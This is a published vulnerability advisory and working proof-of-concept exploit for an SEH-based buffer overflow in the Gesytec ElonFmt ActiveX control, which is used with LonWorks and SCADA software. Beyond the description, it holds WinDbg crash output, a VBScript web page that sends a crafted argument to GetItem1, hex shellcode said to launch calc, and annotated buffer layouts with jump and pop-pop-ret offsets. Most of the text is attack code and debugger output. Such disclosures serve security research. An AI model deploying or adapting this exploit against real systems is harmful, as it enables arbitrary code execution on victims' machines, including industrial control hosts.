Gesytec ElonFmt ActiveX 1.1.14 (ElonFmt.ocx) pid Item Bu

Author: LiquidWorm Published: 2011-04-21 Verified: Verified




Gesytec ElonFmt ActiveX 1.1.14 (ElonFmt.ocx) pid Item Buffer Overflow (SEH)

Vendor: Gesytec GmbH
Product web page:
Affected version:

Summary: Connects LonWorks networks to process control, visualization, SCADA
and office software.

Desc: The ElonFmt ActiveX Control Module suffers from a buffer overflow
vulnerability. When a large buffer is sent to the pid item of the GetItem1
function in elonfmt.ocx module, we get a few memory registers overwritten
including the SEH. We're dealing with a character translation. An attacker
can gain access to the system on the affected node and execute arbitrary code.


(fc.1608): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=cccccccc edx=7c9032bc esi=00000000 edi=00000000
eip=cccccccc esp=0013e7d8 ebp=0013e7f8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
cccccccc ??              ???
0:000> !exchain
0013e7ec: ntdll!ExecuteHandler2+3a (7c9032bc)
0013ecf0: cccccccc
Invalid exception stack at bbbbbbbb
0:000> u 0013ecf0
0013ecf0 bbbbbbbbcc      mov     ebx,0CCBBBBBBh
0013ecf5 cc              int     3
0013ecf6 cc              int     3
0013ecf7 cc              int     3
0013ecf8 dddd            fstp    st(5)
0013ecfa dddd            fstp    st(5)
0013ecfc dddd            fstp    st(5)
0013ecfe dddd            fstp    st(5)


0:000> d esp
0013eb58  01 00 00 00 8d 61 53 80-7c 5a 63 af 00 00 00 00  .....aS.|Zc.....
0013eb68  88 d5 2e ba 00 00 00 00-24 46 53 8a 00 86 8f bf  ........$FS.....
0013eb78  a8 5a 63 af a8 5a 63 af-fb 0a 80 bf 60 29 53 89  .Zc..Zc.....`)S.
0013eb88  ce 86 8f bf 68 d5 2e ba-88 d5 2e ba 00 00 00 00  ....h...........
0013eb98  06 00 05 00 a1 00 00 00-2e 0e 73 74 d1 18 43 7e
0013eba8  01 00 00 00 00 00 00 00-40 f7 47 00 81 18 c3 77  ........@.G....w
0013ebb8  1a 03 00 00 a2 56 00 10-00 ed 13 00 e8 eb 13 00  .....V..........
0013ebc8  20 8f 63 01 b8 8e 63 01-81 18 c3 77 01 00 00 00   .c...c....w....
0:000> d
0013ebd8  64 21 12 77 ff 00 00 00-74 e1 97 7c 51 7c 91 7c  d!.w....t..|Q|.|
0013ebe8  aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa  ................
0013ebf8  aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa  ................
0013ec08  aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa  ................
0013ec18  aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa  ................
0013ec28  aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa  ................
0013ec38  aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa  ................
0013ec48  aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa  ................


0:000> d
0013ece8  aa aa aa aa aa aa aa aa-bb bb bb bb cc cc cc cc  ................
0013ecf8  dd dd dd dd dd dd dd dd-dd ad d0 01 01 00 63 01  ..............c.
0013ed08  00 00 00 00 b8 8e 63 01-01 00 00 00 00 ed 13 00  ......c.........
0013ed18  82 a5 00 10 8c ed 13 00-b8 8e 63 01 28 ee 13 00  ..........c.(...
0013ed28  00 00 00 00 80 02 63 01-80 ed 13 00 ae 43 dd 73  ......c......C.s
0013ed38  5c ed 13 00 d8 f0 00 10-02 00 00 00 d9 a3 00 10  \...............
0013ed48  80 02 63 01 24 8e 56 01-01 00 00 00 78 8e 63 01  ..c.$.V.....x.c.
0013ed58  48 ed 13 00 80 ed 13 00-98 f0 00 10 01 00 00 00  H...............


Tested on: Microsoft Windows XP Professional SP3 (EN)
           Easylon OPC Server M

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            liquidworm gmail com
                            Zero Science Lab -

High five to sickn3ss!

Advisory ID: ZSL-2011-5011
Advisory URL:




<object classid='clsid:824C4DC5-8DA4-11D6-A01F-00E098177CDC' id='zsl' />
<script language='VBScript'>

targetFile = "C:\Easylon\Shared\ElonFmt.ocx"
prototype  = "Function GetItem1 ( ByVal typeName As String ,  ByVal pid As String ,  ByVal selector As Integer ) As Object"
memberName = "GetItem1"
progid     = "ELONFMTLib.ElonFmt"
argCount   = 3


arg2 = String(10, "90") _
     + "2bc9b88bc18865b132ddc3d97424f45d31450e03" _
     + "450e834ec56a90ac2ee35b4caf94d2a99e8681ba" _
     + "b316c1ee3fdc871acb900f2d7c1e76007daeb6ce" _
     + "bdb04a0c921272dfe753b33d07016c4abab6190e" _
     + "07b6cd0537c068d9cc7a72097cf03cb1f65e9dc0" _
     + "dbbce18b5076910ab1465a3dfd0565f2f054a134" _
     + "eb22d94796341a3a4cb0bf9c0762641dcbf5ef11" _
     + "a072b7353756c341bc5904c0867d80895d1f9177" _
     + "3320c1dfec8489cdf9bfd39bfc326ee2ff4c7144" _
     + "687cfa0bef8129681fc870d88895e059d525df9d" _
     + "e0a5ea5d17b59e5853717210cc147487ed3c1746" _
     + "7edcd8" _
     + String(62, "A") + "eb069090" + "78c70110" _
     + "e9e0fdffff" + String(20, "D")


zsl.GetItem1 arg1 ,arg2 ,arg3

'Argument No.2 Structure:
' (20)NOPSLED + (446)SCODE(calc) + (62)JUNK + (8)JMP + (8)P/P/R EDI LDRF32R.dll + (10)JMP BCk + (20)JUNK
'Scenes (2/5)
'arg2 = String(528, "A") + "BBBBBBBB" + "CCCCCCCC" + "DDDDDDDD" + "41414141"
'           junk             nseh        seh(eip)        pad         eip
'arg2 = String(528, "A") + "BBBBBBBB" + "CCCCCCCC" + String(101, "D")
'           junk             nseh        seh(eip)         random
